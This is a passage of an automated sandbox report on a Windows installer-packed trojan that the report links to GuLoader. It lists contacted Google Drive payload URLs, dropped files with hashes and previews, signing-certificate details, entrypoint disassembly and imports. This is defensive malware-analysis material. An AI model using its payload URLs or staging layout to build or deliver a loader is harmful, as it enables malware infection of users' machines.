                                        		high
                                        https://drive.google.com/C1AOsb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E15000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://drive.google.com/c1aOsb7hkGfAb.exe, 00000008.00000003.2580408601.0000000002E19000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.comlOsb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E15000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            216.58.206.33
                                            		drive.usercontent.google.comUnited States
                                            		15169GOOGLEUSfalse
                                            142.250.184.206
                                            		drive.google.comUnited States
                                            		15169GOOGLEUSfalse

                                            General Information

                                            Joe Sandbox version:42.0.0 Malachite
                                            Analysis ID:1587621
                                            Start date and time:2025-01-10 15:52:52 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 6m 23s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:10
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:Osb7hkGfAb.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:ad1dfc910b1815aea7983124549d2c04376db9b2249b99e3e672b91df91bfec6.exe
                                            Detection:MAL
                                            Classification:mal76.troj.evad.winEXE@3/8@2/2
                                            EGA Information:
                                            • Successful, ratio: 50%
                                            HCA Information:
                                            • Successful, ratio: 89%
                                            • Number of executed functions: 46
                                            • Number of non-executed functions: 29
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                            • Excluded IPs from analysis (whitelisted): 20.109.210.53
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            09:54:59API Interceptor24x Sleep call for process: Osb7hkGfAb.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            No context

                                            Domains

                                            No context

                                            ASNs

                                            No context

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            37f463bf4616ecd445d4a1937da06e19fTSt7dc60O.exeGet hashmaliciousGuLoaderBrowse
                                            • 216.58.206.33
                                            • 142.250.184.206
                                            vq6jxdGvD6.exeGet hashmaliciousGuLoaderBrowse
                                            • 216.58.206.33
                                            • 142.250.184.206
                                            Ub46mg9pn4.exeGet hashmaliciousGuLoaderBrowse
                                            • 216.58.206.33
                                            • 142.250.184.206
                                            fTSt7dc60O.exeGet hashmaliciousGuLoaderBrowse
                                            • 216.58.206.33
                                            • 142.250.184.206
                                            nRNzqQOQwk.exeGet hashmaliciousGuLoaderBrowse
                                            • 216.58.206.33
                                            • 142.250.184.206
                                            You7ynHizy.exeGet hashmaliciousGuLoaderBrowse
                                            • 216.58.206.33
                                            • 142.250.184.206
                                            Xjz8dblHDe.exeGet hashmaliciousGuLoaderBrowse
                                            • 216.58.206.33
                                            • 142.250.184.206
                                            zrNcqxZRSM.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                            • 216.58.206.33
                                            • 142.250.184.206
                                            CY SEC AUDIT PLAN 2025.docx.docGet hashmaliciousUnknownBrowse
                                            • 216.58.206.33
                                            • 142.250.184.206

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\user\AppData\Local\Temp\nswE071.tmp\System.dllfbXZ4ErQMU.exeGet hashmaliciousGuLoaderBrowse
                                              fbXZ4ErQMU.exeGet hashmaliciousUnknownBrowse
                                                dIPYIbWXs1.exeGet hashmaliciousUnknownBrowse
                                                  dIPYIbWXs1.exeGet hashmaliciousGuLoaderBrowse
                                                    eAvqHiIsgR.exeGet hashmaliciousGuLoaderBrowse
                                                      eAvqHiIsgR.exeGet hashmaliciousGuLoaderBrowse
                                                        RFQ-24064562-SUPPLY-NOv-ORDER.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          LkzvfB4VFj.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            LkzvfB4VFj.exeGet hashmaliciousGuLoaderBrowse
                                                              z120X20SO__UK__EKMELAMA.exeGet hashmaliciousGuLoader, RemcosBrowse

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Temp\nswE071.tmp\System.dll

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):11776
                                                                Entropy (8bit):5.854450882766351
                                                                Encrypted:false
                                                                SSDEEP:192:jPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4I:u7VpNo8gmOyRsVc4
                                                                MD5:34442E1E0C2870341DF55E1B7B3CCCDC
                                                                SHA1:99B2FA21AEAD4B6CCD8FF2F6D3D3453A51D9C70C
                                                                SHA-256:269D232712C86983336BADB40B9E55E80052D8389ED095EBF9214964D43B6BB1
                                                                SHA-512:4A8C57FB12997438B488B862F3FC9DC0F236E07BB47B2BCE6053DCB03AC7AD171842F02AC749F02DDA4719C681D186330524CD2953D33CB50854844E74B33D51
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: fbXZ4ErQMU.exe, Detection: malicious, Browse
                                                                • Filename: fbXZ4ErQMU.exe, Detection: malicious, Browse
                                                                • Filename: dIPYIbWXs1.exe, Detection: malicious, Browse
                                                                • Filename: dIPYIbWXs1.exe, Detection: malicious, Browse
                                                                • Filename: eAvqHiIsgR.exe, Detection: malicious, Browse
                                                                • Filename: eAvqHiIsgR.exe, Detection: malicious, Browse
                                                                • Filename: RFQ-24064562-SUPPLY-NOv-ORDER.com.exe, Detection: malicious, Browse
                                                                • Filename: LkzvfB4VFj.exe, Detection: malicious, Browse
                                                                • Filename: LkzvfB4VFj.exe, Detection: malicious, Browse
                                                                • Filename: z120X20SO__UK__EKMELAMA.exe, Detection: malicious, Browse
                                                                Reputation:moderate, very likely benign file
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....`...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\tranchet\Choriambic.Can

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):210620
                                                                Entropy (8bit):7.5479608224177
                                                                Encrypted:false
                                                                SSDEEP:3072:TxsXh+JF13htt8PqX5tMt86Z3XfXA2QqtG0i3xDW4+E/lXSIjfOxVaXm2:TKXS1x70vXbDGNMGxScOHa1
                                                                MD5:87B5C774E173976A2E28F1BA83D0AF19
                                                                SHA1:84F517D61D4108AF7970FD480EF38F84C69508DD
                                                                SHA-256:D3ADC7A77CF3BED6B58380322BE620D613085797830847ACEF8BAC9B88E14F7A
                                                                SHA-512:D3AAFC404CF4F24AC2A75B0EFB3F815D7B53A3B96132122B490531B488BF04FF4AE5444744FDE22C14B8DCD943AA82AE77350A0247D705C08485D7A1C26AB5F7
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:...r.....R....pp..FF.........i...a......................v....R......R..###........................*...................c. ......................o........U................................,..............D......................wwww.....+..$....h...HH............FF.........&...KKKKKK..D............m......_..).l..".......R..L....[.............$.........y.y....t................444............D...........2.&&...~.z.......TT...EEEE.l..........VVVV..F...........................__..........+...>>.........xxx...c.k........1............rrrr............{{..............l........................j........................_...mm.........j...........*.............FFFFF..................;;;....zz....................................M............6.......@....'.......$...................;..........<<..........,....I..............Y...999.......................`......@..ff.................................................]....................tt.......`.....v..............|||./........vv.E.qq.. ....O..........{

                                                                C:\Users\user\tranchet\Dziggetai.Out

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):441234
                                                                Entropy (8bit):2.643055597561025
                                                                Encrypted:false
                                                                SSDEEP:1536:QZmWsnh5l4WzxPFhMOzNJoDb8glX1rYrkbN39D8e7A7Sg2gGqAXr2bHLopKRJ8No:ot0r3reuPrpL/7zB7nMWi0FThhJtG4
                                                                MD5:B3702DCDA1481DA4539338C0B2D6E4EB
                                                                SHA1:40A2001A107BE6C3D4587D8E5FF5FAEFA6C61A1B
                                                                SHA-256:F2F2395066AB9072911FC0D46DAA8DFB2C7AEFB30BE7DAB9B7BBDC7583B9A94F
                                                                SHA-512:AAB912267A32EA594A37BFB57F002AB8340C2CD94C2EB21E37ECE375F899D01207C48E8BF9429FB7CC302E5F17D8F8DF17EA208450D26F416A0372D2BCA245AE
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:0000000037009E9E9E0000008F8F00ECEC00D9000000000000ABAB00A0000000008000006E00313131000D0D0D006464006E000E0E000000E4000000C6000000E200000021000000000000D2D2000032002F2F004500000000EAEAEA0000E50000717100EEEE001100CCCCCCCCCCCCCC00B7B7B70000FCFC0000000000000000B7B7B7B7B7B700BDBD00B7000044444400007C00660000000000830000808080800000282800DF003900D2006666001F00970000AAAA00FE000000B9009E9E9E9E9E002B00000000003C00008F8F8F000400010101000083004900004100004300000000E700001D1D0000000707070700000000004C000000161616000000DDDDDDDD005B5B00006200B7B7B7B700000000CE00000000FD000000BDBD000043008F8F8F8F00005F5F002600A6005C5C007474747400A2A2A2A2A20000E9E9007979797979790000B100000000004200001C000000240000D4000000A800E00000000000000018000000620000001A1A1A00E8000000999999990000000000383838383838005555000057570000AD00003838380000000000797900000000001A1A000045000002020202020200CBCB0000F700EE005700C0C0000000004E4E00004646464646003D00191919000000000000EFEFEFEF000046460000410065650000DEDEDE00000000005E0000010030303030

                                                                C:\Users\user\tranchet\computerskrmen.dem

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):485127
                                                                Entropy (8bit):1.2565961974341746
                                                                Encrypted:false
                                                                SSDEEP:768:bgBMgq+aLnwfPnz/Km1iLGyDPiU55NCk+T93YpnK77oTpvYP3knePjlW0kwNGL+q:XQ3wvosOsCpxFJrXSBmHzTu58UR
                                                                MD5:580D05E679E74B036B55CA8E5FF32769
                                                                SHA1:10175C43AB7B725FFFCF770EB2C3555E91D3BA13
                                                                SHA-256:B3E34975017C193D4672BEC42BC52B55F8AE1F1D5F30D56DCFD0B3A4242C3BE4
                                                                SHA-512:0E26F0084BED372785A5E8C8BE3A0717074AA52C2E8B5413FA9F2CB8DEED40BF8BDBF15C411EFFA432A8B96E50AE6085E8F90A97350827AFAA1BE1AB4B3E1643
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:.................3.........................................=.....................................`.............................................................................n........................... .L.........................(,.b...e.......\...............................u.....................[.............................n........................[........................................c...........................W...........................................................*..].h.............R..............................................*............................^.....$.....w...................................................p...............................................................$.t...................................w*....................b....E.......................|.............5.......E................................................P.........d..................vl...........}..."..................................1.............................k.....7...............

                                                                C:\Users\user\tranchet\predictors.dut

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):389868
                                                                Entropy (8bit):1.2469892412772452
                                                                Encrypted:false
                                                                SSDEEP:768:8mGX5iY6YFC1hSNYG8n6aCKBHwcX7e3ZNrt7qNIxKpGEopKfWOO72cDEDQ+7IF5i:m5ittaAwW6q8KH13QyOgs2w
                                                                MD5:2A500E1219C4894E2D45C32C5A5A11FD
                                                                SHA1:AC9A88DE4C84E1EB8A535E1061CBC6584380D24E
                                                                SHA-256:C65F223375C6DFE8CE71213D5DD24F39CDE31F772D2C66521BF07B21BE45E6C1
                                                                SHA-512:89ED91AF91CF969FE7EC087EE107B52959582615EFB2AB72A21D6C3820E5BDDA78EE02EB39BB323FD996D85510627387616DF8917B12052A62D288D8E9448596
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:...........................E.....................................................................<......................].....f........................_...G..........S....................................@...............j...................................................I...................|..C..........................................................d......%t..........N..................d...Q...........p....3..........................................L...........y...............................-........................................................................@.........]..3........A................................*............................................................................................@...........(............................{..4......................................k.................{.....................W.................,......+...............K....b.......................!.............................H..)..........................E..........................

                                                                C:\Users\user\tranchet\receptionssekretrer.bin

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):442363
                                                                Entropy (8bit):1.2533707838755617
                                                                Encrypted:false
                                                                SSDEEP:1536:f6KFImN7hPg1fMcZ9pkK6m1rmkrDAji7VW9EgfrY:PyMtabPE+7ctfM
                                                                MD5:5465B75724C031B21C018F7D72941F72
                                                                SHA1:98176B27A41A35401A96D0AAC0859EEC25A4C5FE
                                                                SHA-256:7390780C6FB1F7B57C950A11AE287127CB6144CE9AD1C26E8C242BADB685729B
                                                                SHA-512:7084191B13FF854943DEE9FB6DDC1D7F89D06055FF4DA7E04DA1C359B557AC22762209B8DFE061F3AF628DF077E1D1D1009E9F9A18E3C9441AEE7FD4FDFF1688
                                                                Malicious:false
                                                                Preview:.........................................................................|......................................v..g..................................................................C...........`.......................................... ...............#.....................K..0.................\................................4.......................................y...................."........k..............9.H.................................................................."...........m............................6...................................................E..)..........[..............TZ..............Q............_...........$...... ..........................W....................................................y..................................q......!.................................... .....................o..........*........................................................................[..............9..................s....;..........................................

                                                                C:\Users\user\tranchet\serenissimi.txt

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):521
                                                                Entropy (8bit):4.284169749449499
                                                                Encrypted:false
                                                                SSDEEP:12:7+SriF8i+WUQDJBYqRIE47W0BvM71ARi9ulhji4JDQCr6K:7tuZ+d6/GEUI18jhJsCr6K
                                                                MD5:B089BD0CBC944DE0B1023E6CE9318BD3
                                                                SHA1:715FA74E243D5C3419519E7371ED1836C9BCFA4A
                                                                SHA-256:1E8ABB4A5E85595B0EF2FC73E9012EDDFE1BCB7363E90A2EA46F561DD3742F93
                                                                SHA-512:A164EB2AB02E612E9F96531006C4A71B8D6E8EA6444D86907CB15EF2C1AAB4680EAF3BB580C6A1D5B89A3F454F3E532242FC1DE2B71A9FFF56F812F6E4638885
                                                                Malicious:false
                                                                Preview:dibasic skinnebenssaarenes rembrandt unembayed timerne ependytes overtorturing.ruskindenes cellemembranen visirs daarligste bartholomeuss eslabon trflen communizations karikaturtegners forsgsstadiet hillocked..perfumers afplukker simonized jubilumsmiddags dolktids spokane milliontedel indfoertes dour..margented pomerans semicylindrical skifferolies kernerelationerne univalent,tiltrdelsesforelsning hydrion caggy stabejserne figurist vt klutzier bendy hanekamme..duilin molompi cuartino fornagl tortricoidea unhurrying.

                                                                C:\Windows\Arder.lnk

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                Category:dropped
                                                                Size (bytes):720
                                                                Entropy (8bit):3.2288126259080765
                                                                Encrypted:false
                                                                SSDEEP:12:8wl0bsXyEKW2jmGlnEEuMqEOMK3w/g/iCNJkKAP4t2YZ/elFlSJm:8slKPjTvuz38/4i2HAFqy
                                                                MD5:B5EA2A86C8F0A31E9DE6AB32353AC214
                                                                SHA1:4944FE188B2CC8BEE79E72CD296EE9500902A74B
                                                                SHA-256:C3224AF89AC5B5CB10EDAEC9D409F784F55209D8472EB0EB675ABDD1B7716916
                                                                SHA-512:25666596525681244EDF2E4A0993376B07F333A4B541A4B90158CBA5E074A148E764C35A21BA925E2FCA8862FD9E8A6BC00C5527E48A54BB5FF60637E9EDFB52
                                                                Malicious:false
                                                                Preview:L..................F........................................................9....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................t.i.n.a.....l.2...........Disannex.And37..N............................................D.i.s.a.n.n.e.x...A.n.d.3.7.............\.U.s.e.r.s.\.t.i.n.a.\.D.i.s.a.n.n.e.x...A.n.d.3.7.".C.:.\.U.s.e.r.s.\.t.i.n.a.\.t.r.a.n.c.h.e.t.\.T.r.y.k.m.a.a.l.e.r.e.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Entropy (8bit):7.544810246742741
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:Osb7hkGfAb.exe
                                                                File size:887'424 bytes
                                                                MD5:a09950fd9af3c4e3ff6f778ab5d8ce0f
                                                                SHA1:043462f3e5a9b3133908c39e6c3fd8a4f0cade1b
                                                                SHA256:ad1dfc910b1815aea7983124549d2c04376db9b2249b99e3e672b91df91bfec6
                                                                SHA512:316f36143bfb519a3fd27766960f8c758867da2df52463b7373431c2788811c11823c06fe4934e990102c9c2039feb010a501ddaa99274973dd0024f192fa3c2
                                                                SSDEEP:24576:QiGFaq43NvC0vEFsNtiqnRCujTrlLq9u4J/QOeaa:QiGFu3NvnEFsNtRdu9u4J/qaa
                                                                TLSH:DC15122AF700D9AAD4708F718D9ED256EBD07E2828200BAB7F997B4BBD72051D01F255
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L... ..`.................f...|......H3............@

                                                                File Icon

                                                                Icon Hash:0e13672535353f1c

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x403348
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x60FC9220 [Sat Jul 24 22:20:16 2021 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:ced282d9b261d1462772017fe2f6972b

                                                                Authenticode Signature

                                                                Signature Valid:false
                                                                Signature Issuer:CN="Customhouses Bagdres Landsale ", E=Vincula@algorithms.Tum, L=Montrose, S=Colorado, C=US
                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                Error Number:-2146762487
                                                                Not Before, Not After
                                                                • 19/02/2024 00:47:06 18/02/2027 00:47:06
                                                                Subject Chain
                                                                • CN="Customhouses Bagdres Landsale ", E=Vincula@algorithms.Tum, L=Montrose, S=Colorado, C=US
                                                                Version:3
                                                                Thumbprint MD5:6E7AA7D21C7430FFA93D1D5E81C70DD6
                                                                Thumbprint SHA-1:5E5C2F65106F0C48F10C0B17A665BA4A7F3796B1
                                                                Thumbprint SHA-256:9FC97C7BD25A0D8FFAED412DBDA9127DE53CBC6E6B4395C7D8146B5291551423
                                                                Serial:29E0A557697DB56E97230C2F058F9E9DD1580106

                                                                Entrypoint Preview

                                                                Instruction
                                                                sub esp, 00000184h
                                                                push ebx
                                                                push esi
                                                                push edi
                                                                xor ebx, ebx
                                                                push 00008001h
                                                                mov dword ptr [esp+18h], ebx
                                                                mov dword ptr [esp+10h], 0040A198h
                                                                mov dword ptr [esp+20h], ebx
                                                                mov byte ptr [esp+14h], 00000020h
                                                                call dword ptr [004080B8h]
                                                                call dword ptr [004080BCh]
                                                                and eax, BFFFFFFFh
                                                                cmp ax, 00000006h
                                                                mov dword ptr [0042F42Ch], eax
                                                                je 00007F94691B1A63h
                                                                push ebx
                                                                call 00007F94691B4BC6h
                                                                cmp eax, ebx
                                                                je 00007F94691B1A59h
                                                                push 00000C00h
                                                                call eax
                                                                mov esi, 004082A0h
                                                                push esi
                                                                call 00007F94691B4B42h
                                                                push esi
                                                                call dword ptr [004080CCh]
                                                                lea esi, dword ptr [esi+eax+01h]
                                                                cmp byte ptr [esi], bl
                                                                jne 00007F94691B1A3Dh
                                                                push 0000000Bh
                                                                call 00007F94691B4B9Ah
                                                                push 00000009h
                                                                call 00007F94691B4B93h
                                                                push 00000007h
                                                                mov dword ptr [0042F424h], eax
                                                                call 00007F94691B4B87h
                                                                cmp eax, ebx
                                                                je 00007F94691B1A61h
                                                                push 0000001Eh
                                                                call eax
                                                                test eax, eax
                                                                je 00007F94691B1A59h
                                                                or byte ptr [0042F42Fh], 00000040h
                                                                push ebp
                                                                call dword ptr [00408038h]
                                                                push ebx
                                                                call dword ptr [00408288h]
                                                                mov dword ptr [0042F4F8h], eax
                                                                push ebx
                                                                lea eax, dword ptr [esp+38h]
                                                                push 00000160h
                                                                push eax
                                                                push ebx
                                                                push 00429850h
                                                                call dword ptr [0040816Ch]
                                                                push 0040A188h

                                                                Rich Headers

                                                                Programming Language:
                                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x580000x41dd0.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xd77200x1360
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x64570x6600f6e38befa56abea7a550141c731da779False0.6682368259803921data6.434985703212657IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x80000x13800x1400569269e9338b2e8ce268ead1326e2b0bFalse0.4625data5.2610038973135005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0xa0000x255380x60017edd496e40111b5a48947c480fda13cFalse0.4635416666666667data4.133728555004788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .ndata0x300000x280000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x580000x41dd00x41e0051f103b856396aac282c5bd5a24beff1False0.6063619248102466data5.8960782160116745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0x583b80x130caPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.998410786148207
                                                                RT_ICON0x6b4880x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.40775464332189754
                                                                RT_ICON0x7bcb00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.4554866512507883
                                                                RT_ICON0x851580x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishUnited States0.462218045112782
                                                                RT_ICON0x8b9400x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.4729667282809612
                                                                RT_ICON0x90dc80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.46835144071799717
                                                                RT_ICON0x94ff00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5149377593360995
                                                                RT_ICON0x975980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5457317073170732
                                                                RT_ICON0x986400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6073770491803279
                                                                RT_ICON0x98fc80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6719858156028369
                                                                RT_DIALOG0x994300x100dataEnglishUnited States0.5234375
                                                                RT_DIALOG0x995300x11cdataEnglishUnited States0.6056338028169014
                                                                RT_DIALOG0x996500xc4dataEnglishUnited States0.5918367346938775
                                                                RT_DIALOG0x997180x60dataEnglishUnited States0.7291666666666666
                                                                RT_GROUP_ICON0x997780x92Targa image data - Map 32 x 12490 x 1 +1EnglishUnited States0.7191780821917808
                                                                RT_VERSION0x998100x27cdataEnglishUnited States0.5
                                                                RT_MANIFEST0x99a900x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                Imports

                                                                DLLImport
                                                                ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                                SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                                ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                                COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                                GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
